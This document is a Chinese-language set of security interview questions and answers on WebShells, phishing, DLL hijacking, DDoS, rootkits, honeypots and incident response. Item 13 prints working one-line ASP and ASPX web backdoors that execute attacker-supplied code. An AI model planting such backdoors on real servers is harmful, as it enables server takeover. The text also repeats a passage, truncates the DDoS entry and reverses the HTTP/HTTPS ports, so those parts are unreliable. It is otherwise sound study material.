1.什么是WebShell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的─种命令执行环境,也可以将其称做为─种网页后门。黑客在入侵了─个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在─起,然后就可以使用浏览器来访问这些asp或者php后门,得到─个命令执行环境,以达到控制网站服务器的目的(可以上传下载文件,查看数据库,执行任意程序命令等)。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等。 静态网页:最常用的格式文件就是html格式文件,大部分网页的格式都是html格式,html格式又包含有.htm、dhtml.xhtml.shtm.shtml。这些都是指静态页面,里面不含有动态程序。
动态网页:页面级包括有ASP(基于JavaScript 或VbScript或C#)、JSP、PHP、ASPX、jspx、cgi。这些里面是包含服务器端执行的代码,也就是服务器在将这些网页发给客户端之前,会先执行里面的动态程序语言,并把执行后生成的html发送到客户端来的,所以我们在客户端看到的源代码也是html格式的(因为动态的代码直接在服务器上执行,而这些服务器代码是前台是不会显示出来。
2.什么是网络钓鱼? 网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATMPIN 码或信用卡详细信息)的一种攻击方式。 最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。 它常常导引用户到URL与接口外观与真正网站几无二致的假冒网站输入个人数据。就算使用强式加密的SSL服务器认证,要侦测网站是否仿冒实际上仍很困难。网钓是一种利用社会工程技术来愚弄用户的实例。它凭恃的是现行网络安全技术的低亲和度。
3.你获取网络安全知识途径有哪些? 网站,看雪,安全焦点,国内的乌云,FreeBuf 视频学习:i春秋,51cto,慕课网,实验楼,实验吧,网易云课堂等等 微信公众号、知乎等,企业src等 书籍,《白帽子讲web安全》《Web应用安全权威指南》等 然后就是请教牛人 最后是公司内技术分享。
DLL劫持原理
由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持(hijack)了。 伪造的dll制作好后,放到程序当前目录下,这样当原程序调用原函数时就调用了伪造的dll的同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持(hijack)了。 伪造的dll制作好后,放到程序当前目录下,这样当原程序调用原函数时就调用了伪造的dll的同名函数,进入劫持DLL的代码,处理完毕后,再调用原DLL此函数。
如何防止DLL劫持 DLL劫持利用系统未知DLL的搜索路径方式,使得程序加载当前目录下的系统同名DLL。所以可以告诉系统DLL的位置,改变加载系统DLL的顺序不是当前目录,而是直接到系统目录下查找。
4.什么是CC攻击?
这个也是知道一些,知道他是DDos的变种,正常请求伪造,服务器资源耗尽,最终还是看看百科答案吧:CC攻击是DDOS(分布式拒绝服务)的一种,相比其它的DDOS攻击CC似乎更有技术含量一些。这种攻击你见不到真实源IP,见不到特别大的异常流量,但造成服务器无法进行正常连接。CC攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC主要是用来攻击页面的,每个人都有这样的体验:当一个网页访问的人数特别多的时候,打开网页就慢了,CC就是模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需要大量CPU时间)的页面,造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的连接直至就网络拥塞,正常的访问被中止。
5.Web服务器被入侵后,怎样进行排查? 最简单就是 查看下web 服务器日志 看看有没有异常端口开放 使用安全狗等服务器安全软件清扫
6.dll文件是什么意思,有什么用? DLL(Dynamic Link Library)文件,即动态链接库,也有人称作应用程序拓展。 Windows应用程序中,实行了模块化设计,也就是说并不是每个应用程序都编写完所有的功能代码,而是在运行过程中调用相应功能的DLL,不需运行的功能就不调用,所以大大加快了程序的加载速度和效率,其他应用程序也可以调用相关的DLL,这样也有利于促进代码重用以及内存使用效率,减少了资源占用,而且程序更新时也只要更新相关的DLL就可以了。 要注意的是,有些病毒也会伪装成DLL文件,并替换系统的DLL文件,需要我们防范。
7.0day漏洞
是已经发现但是官方还没发布补丁的漏洞。 信息安全意义上的0Day是指在安全补丁发布前而被了解和掌握的漏洞信息。
8.Rootkit是什么意思
Rootkit是一种特殊类型的 malware(恶意软件)。Rootkit 之所以特殊是因为您不知道它们在做什么事情。Rootkit基本上是无法检测到的,而且几乎不可能删除它们。虽然检测工具在不断增多,但是恶意软件的开发者也在不断寻找新的途径来掩盖他们的踪迹。 Rootkit的目的在于隐藏自己以及其他软件不被发现。它可以通过阻止用户识别和删除攻击者的软件来达到这个目的。Rootkit 几乎可以隐藏任何软件,包括文件服务器、键盘记录器、Botnet 和Remailer。许多Rootkit 甚至可以隐藏大型的文件集合并允许攻击者在您的计算机上保存许多文件,而您无法看到这些文件。 防止 Rootkit 进入您的系统是能够使用的最佳办法。为了实现这个目的,可以使用与防范所有攻击计算机的恶意软件一样的深入防卫策略。深度防卫的要素包括:病毒扫描程序、定期更新软件、在主机和网络上安装防火墙,以及强密码策略
9.蜜罐 蜜罐好比是情报收集系统。蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击。所以攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。
10.ssh
SSH 为 Secure Shell 的缩写专为远程登录会话和其他网络服务提供安全性的协议.ftp、pop和telnet在本质上都是不安全的 SSL(SecureSockets Layer (SSL) and Transport Layer Security (TLS))被设计为加强Web安全传输(HTTP/HTTPS/)的协议(事实上还有SMTP/NNTP等),SSH(Secure Shell)更多的则被设计为加强Telnet/FTP安全的传输协议,默认地,它使用22端口.
11.DDOS 分布式拒绝服务(DDoS:Distributed Denial ofService)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。利用客户/服务器技术,主控程序能在几秒钟内激活成百上 12.震网病毒:
指一种蠕虫病毒,是第一个专门定向攻击真实世界中基础(能源)设施的“蠕虫”病毒,比如核电站,水坝,国家电网。只要电脑操作员将被病毒感染的U盘插入USB接口,这种病毒就会在神不知鬼不觉的情况下(不会有任何其他操作要求或者提示出现)取得一些工业用电脑系统的控制权。
13.一句话木马
asp一句话木马: <%execute(request("value"))%>
php一句话木马:
变形:
aspx一句话木马: <%@ PageLanguage="Jscript"%> <%eval(Request.Item["value"])%>
14.Https的作用
内容加密建立一个信息安全通道,来保证数据传输的安全; HTTPS和HTTP的区别 https协议需要到CA申请证书。 http是超文本传输协议,信息是明文传输;前者是80,后者是443。
15.手工查找后门木马的小技巧 1、首先最需要注意的地方是系统的启动项 2、查看系统关键目录system32和系统安装目录Windows下的文件 3、观察网络连接是否存在异常,还有“运行”-“cmd”-“netstat -an”查看有没有可疑或非正常程序的网络连接
16.描述OSI(开放系统互联基本参考模型)七层结构 应用层 表示层 会话层 传输层 网络层 数据链路层 物理层 传输层的数据叫段,网络层叫包,数据链路层叫帧,物理层叫比特流,这样的叫法叫PDU(协议数据单元)
17.TCP和UDP的区别
1.TCP协议在传送数据段的时候要给段标号;UDP协议不
2.TCP协议可靠;UDP协议不可靠
3.TCP协议的发送方要确认接收方是否收到数据段(3次握手协议)
18.脱壳 加壳”指的是对编译好的EXE、DLL等文件采用加壳来进行保护;“脱壳”指的就是将文件外边的壳去除,恢复文件没有加壳前的状态。壳分为压缩壳、密码壳、加密壳三种
19.“人肉搜索” 是一种类比的称呼,主要是用来区别传统搜索引擎。它主要是指通过集中许多网民的力量去搜索信息和资源的一种方式
20.SYN Flood的基本原理 SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 从防御角度来说,有几种简单的解决方法, 第一种是缩短SYNTimeout时间 第二种方法是设置SYN Cookie,就是给每一个请求连接的IP地址分配一个Cookie,如果短时间内连续受到某个IP的重复SYN报文,就认定是受到了攻击
21.什么是手机”越狱“ 所谓iOS系统的越狱就是取得系统最高权限的行为,越狱前后iOS系统本身并不会发生质的改变,只是越狱后可以对iOS系统进行更充分的利用而已。
22.主机被入侵,你会如何处理这件事自查解决方案: 1、病毒木马排查。 1.1、使用netstat查看网络连接,分析是否有可疑发送行为 1.2、使用杀毒软件进行病毒查杀。 2、服务器漏洞排查并修复 2.1、查看服务器账号是否有异常,如有则停止删除掉 2.2查看MySQL、SQLServer、FTP、WEB管理后台等其它有设置密码的地方,提高密码强度(字每+数字+特殊符号)大小写,10位及以上 3、开启云盾服务
- NAT(网络地址转换)协议 它实现内网的IP地址与公网的地址之间的相互转换,将大量的内网IP地址转换为一个或少量的公网IP地址,减少对公网IP地址的占用 A类 10.0.0.0--10.255.255.255 B类 172.16.0.0--172.31.255.255 C类 192.168.0.0--192.168.255.255
24.内网穿透 即NAT穿透,采用端口映射,让外网的电脑找到处于内网的电脑,同时也可基于HTTP/2实现web内网穿透。
25.虚拟专用网络 功能是:在公用网络上建立专用网络,进行加密通讯。在企业网络中有广泛应用.